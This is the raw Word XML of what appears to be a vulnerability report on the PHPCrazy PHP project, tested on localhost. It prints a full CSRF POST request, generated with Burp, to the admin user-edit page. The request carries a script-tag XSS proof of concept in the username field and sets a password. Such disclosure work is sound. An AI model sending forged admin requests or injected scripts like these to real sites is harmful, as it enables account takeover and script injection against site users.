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5E51" w14:textId="6CEFB744" w:rsidR="000605C9" w:rsidRDefault="00240574">
      <w:r w:rsidRPr="00240574">
        <w:t>Download address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00F525F9" w:rsidRPr="00AB6315">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://gitee.com/Crazy-code/PHPCrazy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B67F19C" w14:textId="1A1AE20D" w:rsidR="00F525F9" w:rsidRDefault="00481589">
      <w:r w:rsidRPr="00481589">
        <w:t>testing environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：phpstudy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4688A1" w14:textId="04E811B6" w:rsidR="00D67204" w:rsidRDefault="00D800E7">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00B04F2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://127.0.0.1/PHPCrazy-master/PHPCrazy-master/admin/admin.php?action=users&amp;mode=info&amp;user=2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34D0362E" w14:textId="54DD3C6B" w:rsidR="00D800E7" w:rsidRDefault="008374EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="340D636D" wp14:editId="009EF2FF">
            <wp:extent cx="5274310" cy="2441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B501" w14:textId="0BCD4140" w:rsidR="00E2557F" w:rsidRDefault="00793C2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793C2B">
        <w:t>Use burp's csrf plug-in to generate payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C796ED" w14:textId="5C4CDECF" w:rsidR="008374EA" w:rsidRDefault="00E2557F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F7138CD" wp14:editId="5C3ABFCE">
            <wp:extent cx="5274310" cy="3234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F143" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>POST /PHPCrazy-master/PHPCrazy-master/admin/admin.php?action=users&amp;mode=info&amp;user=2 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB3815" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Host: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446365EE" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344A2F4F" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D05A6FE" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE42813" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E25DE2" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2238800B" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Content-Length: 128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C94F0C6" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Origin: http://127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E5C069" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111345F4" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Referer: http://127.0.0.1/PHPCrazy-master/PHPCrazy-master/admin/admin.php?action=users&amp;mode=info&amp;user=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F51E5" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1674971887; Hm_lvt_104e825088869ff9c5855f24ab8204c2=1674971889; PHPSESSID=34vacq8681g4nt3nf81sjf53c3; Crazy_sid=Qmk0RDIwYz1yeCtnSkx1PWdwcEE1NFNDQVFBQUFBPT0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A59721" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A3BE22" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Sec-Fetch-Dest: document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1DC78" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Sec-Fetch-Mode: navigate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4733B153" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Sec-Fetch-Site: same-origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25268CCE" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>Sec-Fetch-User: ?1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F47188" w14:textId="77777777" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B"/>
    <w:p w14:paraId="0C0C8BA3" w14:textId="1B5F14B4" w:rsidR="00793C2B" w:rsidRDefault="00793C2B" w:rsidP="00793C2B">
      <w:r>
        <w:t>username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&amp;email=1427343593%40qq.com&amp;auth=0&amp;password=whiex&amp;submit=%E4%BF%9D%E5%AD%98</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9F5AA" w14:textId="71697143" w:rsidR="00481E35" w:rsidRDefault="00481E35" w:rsidP="00793C2B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10AFBD36" wp14:editId="2D42A966">
            <wp:extent cx="5274310" cy="2454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14EB" w14:textId="3EF91D47" w:rsidR="00481E35" w:rsidRPr="00D800E7" w:rsidRDefault="00321177" w:rsidP="00793C2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E4F4B9" wp14:editId="195A1F88">
            <wp:extent cx="5274310" cy="2409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E35" w:rsidRPr="00D8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C7"/>
    <w:rsid w:val="000605C9"/>
    <w:rsid w:val="00240574"/>
    <w:rsid w:val="00321177"/>
    <w:rsid w:val="00481589"/>
    <w:rsid w:val="00481E35"/>
    <w:rsid w:val="00553233"/>
    <w:rsid w:val="00793C2B"/>
    <w:rsid w:val="008374EA"/>
    <w:rsid w:val="008A5E3D"/>
    <w:rsid w:val="00D12292"/>
    <w:rsid w:val="00D67204"/>
    <w:rsid w:val="00D800E7"/>
    <w:rsid w:val="00E2557F"/>
    <w:rsid w:val="00EA7EC7"/>
    <w:rsid w:val="00F5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55EC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{236F13C3-0CC8-4A09-969E-DF826884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25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/PHPCrazy-master/PHPCrazy-master/admin/admin.php?action=users&amp;mode=info&amp;user=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ee.com/Crazy-code/PHPCraz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eyd7</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>eyd7</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-15T06:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-15T06:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>